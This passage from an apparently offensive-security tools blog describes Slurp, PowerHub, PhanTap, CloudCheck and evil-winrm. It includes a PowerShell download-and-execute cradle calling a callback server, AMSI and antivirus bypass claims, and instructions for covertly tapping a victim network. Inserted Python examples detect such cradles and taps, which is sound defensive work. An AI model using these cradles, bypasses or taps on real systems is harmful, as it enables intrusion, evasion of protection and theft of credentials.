<b>Internal</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcB38eisadbyU3VrTM5DdUsy7oa4zscpGzpp7wIES1Y_Gug0V7a8Mj-SEceDm0Lv0G3nAE7HVJXVaHgBgbrI7n04kXGgiTs3402nHMVQVQrsUMJrPoo8flWLtAd2fHwcXzs_J8-AJCe4ha/s1600/Slurp+internal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="150" data-original-width="532" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcB38eisadbyU3VrTM5DdUsy7oa4zscpGzpp7wIES1Y_Gug0V7a8Mj-SEceDm0Lv0G3nAE7HVJXVaHgBgbrI7n04kXGgiTs3402nHMVQVQrsUMJrPoo8flWLtAd2fHwcXzs_J8-AJCe4ha/s1600/Slurp+internal.png" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">slurp domain <-t|--target> example.com </span>will enumerate the S3 domains for a specific target.</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">slurp keyword <-t|--target> linux,golang,python</span> will enumerate S3 buckets based on those three keywords.</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">slurp internal</span> performs an internal scan using the AWS API.</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
This project uses <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">vgo</span>; you can clone and <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">go build</span> or download from the Releases section.<br />
<br />
Please do not open issues on why you cannot build the project; this project builds like any other Go project. If you cannot build it, I strongly suggest you read the <a href="https://golang.org/ref/spec" target="_blank">go spec</a>.<br />
<br />
Also, the only binaries I'm including are <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">linux/amd64</span>; if you want mac/windows binaries, build them yourself.<br />
<br />
<span style="font-size: large;"><a href="https://github.com/hehnope/slurp" target="_blank">Download Slurp</a></span></div>
Published 2019-08-08T02:45:00.000+05:30: PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnc0Mu7BHfI-k-6OkXkZMdDl1AS8aDuOFU4CYkEgmTNERIcvyG7x9TpwmrrYnJymrpLht28TgPdXXXnIDNM0cjRb1qTlZEhCPVVbBPeObnqSmvswrs5dmOC7QLcjpuvNFvNoJJ_pYV_bW/s1600/PowerHub.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="421" data-original-width="661" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAnc0Mu7BHfI-k-6OkXkZMdDl1AS8aDuOFU4CYkEgmTNERIcvyG7x9TpwmrrYnJymrpLht28TgPdXXXnIDNM0cjRb1qTlZEhCPVVbBPeObnqSmvswrs5dmOC7QLcjpuvNFvNoJJ_pYV_bW/s1600/PowerHub.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.</span></h3>
<br />
During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, deal with endpoint protection, disable the execution policy, etc.<br />
<br />
PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.<br />
<br />
Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.<br />
<br />
On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.<br />
<br />
Here is a simple example (grab information about local groups with PowerView and transfer it back):<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> _____ _____ _ _ _ _______ ______ _ _ _ _ ______</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> |_____] | | | | | |______ |_____/ |_____| | | |_____]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> | |_____| |__|__| |______ | \_ | | |_____| |_____]</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> written by Adrian Vollmer, 2018-2019</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">Run 'Help-PowerHub' for help</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">AmsiScanBuffer patch has been applied.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">0</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">PS C:\Users\avollmer> lhm powerview</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json</span><br />
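From the defender's side, the stager line in the transcript above is the observable: a web download primitive and an invoke-expression in the same script block. The following Python is an added example written for this page, not PowerHub's code; it runs that detection over constructed sample lines modelled loosely on PowerShell script-block logging (event 4104 in the Microsoft-Windows-PowerShell/Operational log, whose text the real events carry in a different layout). Host names, users and timestamps are made up; the first line reuses the stager from the transcript.<br />

```python
import re

# Constructed sample log lines (not real telemetry): "<timestamp> <host> <user> <script text>".
SAMPLE_LOGS = [
    "2019-08-08T02:45:10Z WS01 avollmer $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');",
    "2019-08-08T02:46:02Z WS01 avollmer Get-LocalGroup | pth -Name groups.json",
    "2019-08-08T02:47:30Z WS02 svc_build Get-ChildItem C:\\build | Measure-Object",
    "2019-08-08T02:48:11Z WS03 jdoe iex (New-Object Net.WebClient).DownloadString(\"http://10.0.0.5/a\")",
    "2019-08-08T02:49:05Z WS02 svc_build Invoke-WebRequest http://10.0.0.9/report.csv -OutFile report.csv",
]

# Either half alone is common in benign scripts (downloads happen; Invoke-Expression
# happens); the pairing inside one script block is the signal the stager shows.
DOWNLOAD_RE = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)
INVOKE_RE = re.compile(r"\biex\b|invoke-expression", re.I)


def classify(script_text):
    """Return the detection tags that apply to one script block."""
    tags = []
    if DOWNLOAD_RE.search(script_text) and INVOKE_RE.search(script_text):
        tags.append("download-cradle")
    return tags


def scan_logs(lines):
    """Parse constructed log lines and keep those that match at least one tag."""
    hits = []
    for line in lines:
        timestamp, host, user, script = line.split(" ", 3)
        tags = classify(script)
        if tags:
            hits.append({"time": timestamp, "host": host, "user": user,
                         "tags": tags, "script": script})
    return hits


def hosts_by_tag(hits, tag):
    """Sorted, de-duplicated hosts on which a given tag fired; handy for triage."""
    return sorted({h["host"] for h in hits if tag in h["tags"]})


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(hit["time"], hit["host"], hit["user"], ",".join(hit["tags"]))
        print("    ", hit["script"])
```

The fifth sample line is the reason the two patterns are ANDed: a plain Invoke-WebRequest to a file is routine administration and must not page anyone, whereas the first and fourth lines are the cradle shape regardless of capitalisation or whether the alias or the full cmdlet name is used. Script-block logging needs to be enabled for this telemetry to exist at all, which is the more important control.<br />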
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtjjfmepsOxZTCV6WkUg9CCOL2Wp98YOj9E_dIRs00mRnO2JCdo7PaYG2XsbSzlPJ_xgX1cpdIROvl5MgK_eP3ixuWtHgUDYkqC35iKrp0cMtpzadz5vegYeUAl7l8wF0N6fpDXcE8uyz/s1600/PowerHub+Inaction.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="901" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDtjjfmepsOxZTCV6WkUg9CCOL2Wp98YOj9E_dIRs00mRnO2JCdo7PaYG2XsbSzlPJ_xgX1cpdIROvl5MgK_eP3ixuWtHgUDYkqC35iKrp0cMtpzadz5vegYeUAl7l8wF0N6fpDXcE8uyz/s640/PowerHub+Inaction.png" width="640" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation</span></h3>
PowerHub itself does not need to be installed. Just execute <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">powerhub.py</span>. However, there are a few dependencies. They are listed in the <a href="https://github.com/AdrianVollmer/PowerHub/blob/master/requirements.txt" target="_blank">requirements.txt</a>. Install them either via <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip3 install --user -r requirements.txt</span> or use a virtual environment:<br />
<br />
Run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">python3 -m venv env</span> to create a virtual environment, then use <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">source env/bin/activate</span> to activate it. Now run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">pip3 install -r requirements.txt</span> to install the dependencies inside the virtual environment.<br />
<br />
<b>Python2 is not supported.</b><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Usage</span></h3>
PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">--auth <user>:<pass></span>, otherwise, a randomly generated password will be used for basic authentication.<br />
<br />
The switch <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">--no-auth</span> disables basic authentication, which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, they can also be changed.<br />
<br />
Read <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">./powerhub.py --help</span> and the <a href="https://github.com/AdrianVollmer/PowerHub/wiki/Usage" target="_blank">Wiki</a> for details.<br />
<br />
<span style="font-size: large;"><a href="https://github.com/AdrianVollmer/PowerHub/" target="_blank">Download PowerHub</a></span></div>
Published 2019-08-08T02:17:00.001+05:30, updated 2023-06-15T14:46:52.752+05:30: Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxwqzMdPRRMwPPFSwvc6onlEj1jnCxBLMGZJykgI8T0YCQVsYL6zmqA6sBwlmHfu5f1QqV7GdsWvCrO00HrlsWJmW0rQUTXFR2pz-pWtqXURDXIfCHzxwHLEZ9N03hu88-6kPAOSAkYXD/s1600/PhanTap.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="659" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxwqzMdPRRMwPPFSwvc6onlEj1jnCxBLMGZJykgI8T0YCQVsYL6zmqA6sBwlmHfu5f1QqV7GdsWvCrO00HrlsWJmW0rQUTXFR2pz-pWtqXURDXIfCHzxwHLEZ9N03hu88-6kPAOSAkYXD/s1600/PhanTap.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.</span></h2>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.</span></h3>
<br />
PhanTap is silent in the network and does not affect the victim’s traffic, even in networks with NAC (Network Access Control, 802.1X-2004). PhanTap analyzes traffic on the network and masks its own traffic as the victim device's.<br />
<br />
It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the <a href="https://www.gl-inet.com/products/gl-ar150/" target="_blank">GL.iNet GL-AR150</a>.<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Features:</span></h3>
<ul style="text-align: left;">
<li>Transparent network bridge.</li>
<li>Silent: no ARP, multicast or broadcast traffic of its own.</li>
<li>802.1x passthrough.</li>
<li>Automatic configuration:
<ul style="text-align: left;">
<li>Capture traffic exiting the network (the destination is non-RFC1918): the source IP and MAC are the victim's, the destination MAC is the gateway's.</li>
<li>SNAT bridge traffic to the victim's MAC and IP address.</li>
<li>Set the router's default gateway to the MAC of the gateway detected in the previous step.</li>
</ul>
</li>
</ul>
<br />
<ul style="text-align: left;">
<li>Inspects ARP, multicast and broadcast traffic, adds a route to each machine's IP address and adds its MAC address to the neighbor list, which makes it possible to talk to all the machines in the local network.</li>
<li>Learns the DNS server from traffic and sets the router's DNS server to match.</li>
<li>Can run commands (e.g. <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d/openvpn restart</span>) when a new IP or DNS server is configured.</li>
<li>Lets you choose any VPN software, for example OpenVPN on TCP port 443 so it passes most firewalls.</li>
<li>You can talk to the victim machine (using the gateway IP).</li>
</ul>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Setup</span></h3>
PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).<br />
<br />
If your device uses an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged VLAN), but PhanTap should still work.<br />
<ul style="text-align: left;">
<li>Install a snapshot build, for the <a href="https://downloads.openwrt.org/snapshots/targets/ath79/generic/openwrt-ath79-generic-glinet_gl-ar150-squashfs-sysupgrade.bin" target="_blank">GL.iNet GL-AR150</a></li>
<li>Update the OpenWrt package list</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">opkg update</span><br />
<ul style="text-align: left;">
<li>Install PhanTap package:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">opkg install phantap phantap-learn</span><br />
<ul style="text-align: left;">
<li>Configure the Wifi and start administering the router through it.</li>
<li>Either reboot the device, or run <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d/phantap setup</span>.</li>
<li>Get the interface names from that device:</li>
</ul>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"># uci show network | grep ifname</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.loopback.ifname='lo'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.lan.ifname='eth1'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.wan.ifname='eth0'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">network.wan6.ifname='eth0'</span><br />
<br />
In this example we are using a GL-AR150, which only has 2 interfaces.<br />
<br />
Add the interfaces to the phantap bridge via the following commands in the CLI (assuming we are using a GL-AR150):<br />
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci delete network.lan.ifname</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci delete network.wan.ifname</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci delete network.wan6.ifname</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci set network.phantap.ifname='eth0 eth1'</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">uci commit network</span></li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d/network reload</span></li>
</ul>
<br />
PhanTap is now configured; as soon as you plug it between a victim and their switch, it automatically configures the router and gives it Internet access.<br />
<br />
You can add your favorite VPN to have a remote connection back. PhanTap was tested with a VPN on TCP port 443 to avoid some detection methods.<br />
<br />
You can also add a command to be run when a new IP or DNS server is configured, in <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/config/phantap</span>, e.g. <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">/etc/init.d/openvpn restart</span> (restart the VPN service).<br />
<br />
You can also look at disabling the wifi by default and using hardware buttons to start it (<a href="https://openwrt.org/docs/guide-user/hardware/hardware.button" target="_blank">https://openwrt.org/docs/guide-user/hardware/hardware.button</a>).<br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Limitations, or how it can be detected:</span></h3>
<ul style="text-align: left;">
<li>The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, while modern networks run at 1Gbps.</li>
<li>The network port stays up on the switch side when the victim device is disconnected or shut down.</li>
<li>There is no re-configuration of PhanTap, so it might keep using an IP that has been reassigned to another device (DHCP support is on the roadmap).</li>
<li>Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).</li>
</ul>
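The first two items in this list are switch-side signals that an NMS can check for. The following is an added example, not PhanTap's or the post's own code: it runs the two checks over constructed port telemetry, and the snapshot layout, port names and idle threshold are assumptions.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Added example (not PhanTap code): the two switch-side observations above as a
# check over polled port state. Snapshot layout and threshold are assumptions.


@dataclass(frozen=True)
class PortSnapshot:
    """One poll of an access port, as an NMS would read it from the switch."""
    port: str
    tick: int            # poll sequence number
    link_up: bool
    speed_mbps: int      # negotiated speed, 0 when the link is down
    rx_packets: int      # packets received from the host since the last poll


IDLE_POLLS = 3  # consecutive up-but-idle polls before a port is flagged


def check_ports(snapshots: List[PortSnapshot]) -> List[Tuple[str, str, int]]:
    """Return (port, finding, tick) tuples, at most one per finding kind per port.

    speed_downgrade: the link is up below the best speed ever negotiated on that
                     port (a 100Mbps tap inserted in front of a 1Gbps host).
    up_but_silent:   the link stays up while the host has sent nothing for
                     IDLE_POLLS polls (a tap keeps the switch side up after the
                     host is unplugged or shut down; a real unplug drops the link).
    """
    baseline: Dict[str, int] = {}
    idle_runs: Dict[str, int] = {}
    flagged: Set[Tuple[str, str]] = set()
    findings: List[Tuple[str, str, int]] = []

    # The best speed ever seen on a port is that port's baseline.
    for s in snapshots:
        if s.link_up:
            baseline[s.port] = max(baseline.get(s.port, 0), s.speed_mbps)

    for s in sorted(snapshots, key=lambda x: (x.tick, x.port)):
        if not s.link_up:
            idle_runs[s.port] = 0   # link actually dropped: normal behaviour
            continue
        if s.speed_mbps < baseline[s.port] and (s.port, "speed_downgrade") not in flagged:
            flagged.add((s.port, "speed_downgrade"))
            findings.append((s.port, "speed_downgrade", s.tick))
        idle_runs[s.port] = idle_runs.get(s.port, 0) + 1 if s.rx_packets == 0 else 0
        if idle_runs[s.port] >= IDLE_POLLS and (s.port, "up_but_silent") not in flagged:
            flagged.add((s.port, "up_but_silent"))
            findings.append((s.port, "up_but_silent", s.tick))
    return findings


# Constructed telemetry: Gi1/0/7 drops from 1000 to 100 Mbps and then goes quiet
# without the link dropping; Gi1/0/8 is a host shutting down normally (link goes
# down); Gi1/0/9 is a printer that has always linked at 100 Mbps.
SAMPLE = [
    PortSnapshot("Gi1/0/7", 0, True, 1000, 1500),
    PortSnapshot("Gi1/0/7", 1, True, 100, 1200),
    PortSnapshot("Gi1/0/7", 2, True, 100, 0),
    PortSnapshot("Gi1/0/7", 3, True, 100, 0),
    PortSnapshot("Gi1/0/7", 4, True, 100, 0),
    PortSnapshot("Gi1/0/8", 0, True, 1000, 900),
    PortSnapshot("Gi1/0/8", 1, True, 1000, 300),
    PortSnapshot("Gi1/0/8", 2, False, 0, 0),
    PortSnapshot("Gi1/0/8", 3, False, 0, 0),
    PortSnapshot("Gi1/0/8", 4, False, 0, 0),
    PortSnapshot("Gi1/0/9", 0, True, 100, 40),
    PortSnapshot("Gi1/0/9", 1, True, 100, 0),
    PortSnapshot("Gi1/0/9", 2, True, 100, 35),
    PortSnapshot("Gi1/0/9", 3, True, 100, 0),
    PortSnapshot("Gi1/0/9", 4, True, 100, 12),
]

if __name__ == "__main__":
    for port, kind, tick in check_ports(SAMPLE):
        print(f"{port}: {kind} at poll {tick}")
```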
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Roadmap:</span></h3>
<ul style="text-align: left;">
<li>Add logic to restart the detection when the links go up/down.</li>
<li>Add DHCP packet analysis for dynamic reconfiguration.</li>
<li>Add IPv6 support.</li>
<li>Test limitations of devices that have switches (swconfig) instead of separate interfaces.</li>
</ul>
<div>
<span style="font-size: large;"><a href="https://github.com/nccgroup/phantap" target="_blank">Download PhanTap</a></span></div>
</div>
CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible (published 2019-08-02)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkjvSCrbDESbRIBUTtX-Pw5cFUD_9S09ZgmFQYx-VyGXMGIFBxpJRiMLQ28XXc-_Jbu3H6AUiAokEAm5SLJHuJfDGDRzyxQ_TxWZxijU1eCB9jCuT00XcPpFoagbSYATweDjuUPLEXvIi/s1600/cloudcheck.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="986" height="430" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkjvSCrbDESbRIBUTtX-Pw5cFUD_9S09ZgmFQYx-VyGXMGIFBxpJRiMLQ28XXc-_Jbu3H6AUiAokEAm5SLJHuJfDGDRzyxQ_TxWZxijU1eCB9jCuT00XcPpFoagbSYATweDjuUPLEXvIi/s640/cloudcheck.png" width="640" /></a></div>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible </span></h3>
<br />
Cloudcheck is made to be used in the same folder as <a href="https://github.com/m0rtem/CloudFail" target="_blank">CloudFail</a>. Make sure all files in this repo are in the same folder before using.<br />
<br />
CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.<br />
<br />
Using Tor to mask all requests, the tool as of right now has 3 different attack phases.<br />
<ul style="text-align: left;">
<li>Misconfigured DNS scan using DNSDumpster.com.</li>
<li>Scan the Crimeflare.com database.</li>
<li>Bruteforce scan over 2500 subdomains.</li>
</ul>
<br />
Cloudcheck creates an empty text file called <span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">none.txt</span> in the data folder, so that CloudFail skips the subdomain brute force when testing.<br />
<br />
Cloudcheck will automatically change your hosts file using entries from CloudFail, and test for a specified string to detect whether said entry can be used to bypass Cloudflare.<br />
<br />
If the output is "True", the IP address can be used in your hosts file to bypass Cloudflare (automating this step is planned).<br />
<br />
<span style="font-size: large;"><a href="https://github.com/ANK1036Official/Cloudcheck" target="_blank">Download Cloudcheck</a></span><br />
<br /></div>
The Ultimate WinRM Shell For Penetration Testing (published 2019-07-31)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC2dtjkLURh85sw5WQcATG6RucvUEy9ZFhfg_ZG__52ook0FQfpnew6k73ajYkKZQUoWOWTQpl5PeN-_j_4TM9AqDB1wTp5ZbctWXdFiZSQUy9uU2mtDG1f4pnApKnHi0oit8VQDWoTjMf/s1600/Evil+WinRM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="411" data-original-width="579" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC2dtjkLURh85sw5WQcATG6RucvUEy9ZFhfg_ZG__52ook0FQfpnew6k73ajYkKZQUoWOWTQpl5PeN-_j_4TM9AqDB1wTp5ZbctWXdFiZSQUy9uU2mtDG1f4pnApKnHi0oit8VQDWoTjMf/s1600/Evil+WinRM.png" /></a></div>
<h2 style="text-align: left;">
<span style="color: #073763;">This shell is the ultimate WinRM shell for hacking/pentesting.</span></h2>
<h3 style="text-align: left;">
<span style="color: #073763;">WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. </span></h3>
<br />
WS-Management is a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their operating systems in order to make life easier for system administrators.<br />
<br />
This program can be used on any Microsoft Windows server with this feature enabled (usually on port 5985), provided you have credentials and permissions to use it, so it belongs to the post-exploitation phase of a pentest.<br />
<br />
The purpose of this program is to provide nice and easy-to-use features for pentesting. It can be used for legitimate purposes by system administrators as well, but most of its features are focused on hacking/pentesting work.<br />
<br />
<h2 style="text-align: left;">
<span style="color: #073763;">Features</span></h2>
<ul style="text-align: left;">
<li>Command History</li>
<li>WinRM command completion</li>
<li>Local files completion</li>
<li>Upload and download files</li>
<li>List remote machine services</li>
<li>FullLanguage Powershell language mode</li>
<li>Load Powershell scripts</li>
<li>Load in memory dll files bypassing some AVs</li>
<li>Load in memory C# (C Sharp) compiled exe files bypassing some AVs</li>
<li>Colorization on output messages (can be disabled optionally)</li>
</ul>
<div>
<br /></div>
<h3 style="text-align: left;">
<span style="color: #073763;">Help</span></h3>
<b>Usage: </b><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]</span><br />
<br />
<ul style="text-align: left;">
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-i, --ip IP</span> Remote host IP or hostname (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-P, --port PORT</span> Remote host port (default 5985)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-u, --user USER</span> Username (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-p, --password PASS</span> Password</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-s, --scripts PS_SCRIPTS_PATH</span> Powershell scripts path (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-e, --executables EXES_PATH</span> C# executables path (required)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-U, --url URL</span> Remote URL endpoint (default /wsman)</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-V, --version</span> Show version</li>
<li><span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">-h, --help</span> Display this help message</li>
</ul>
<h3 style="text-align: left;">
<span style="color: #073763;">Requirements</span></h3>
Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.<br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">~$ sudo gem install winrm winrm-fs colorize stringio</span><br />
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Installation </span></h3>
<b>Step 1. Clone the repo: </b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">git clone https://github.com/Hackplayers/evil-winrm.git</span><br />
<br />
<b>Step 2. Ready. Just launch it!</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'</span><br />
<br />
If you don't want to put the password in clear text, omit the -p argument and you will be prompted for the password without it being echoed.<br />
<br />
To use IPv6, the address must be added to /etc/hosts.<br />
<br />
<b><span style="color: #073763;">Alternative installation method as ruby gem</span></b><br />
<br />
<b>Step 1. Install it: </b><br />
<b><br /></b>
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;">gem install evil-winrm</span><br />
<br />
<b>Step 2. Ready. Just launch it!</b><br />
<br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"> ~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'</span><br />
<span style="background-color: #f3f3f3; color: #274e13; font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<h3 style="text-align: left;">
<span style="color: #073763;">Documentation</span></h3>
<b><span style="color: #073763;">Basic commands</span></b><br />
<br />
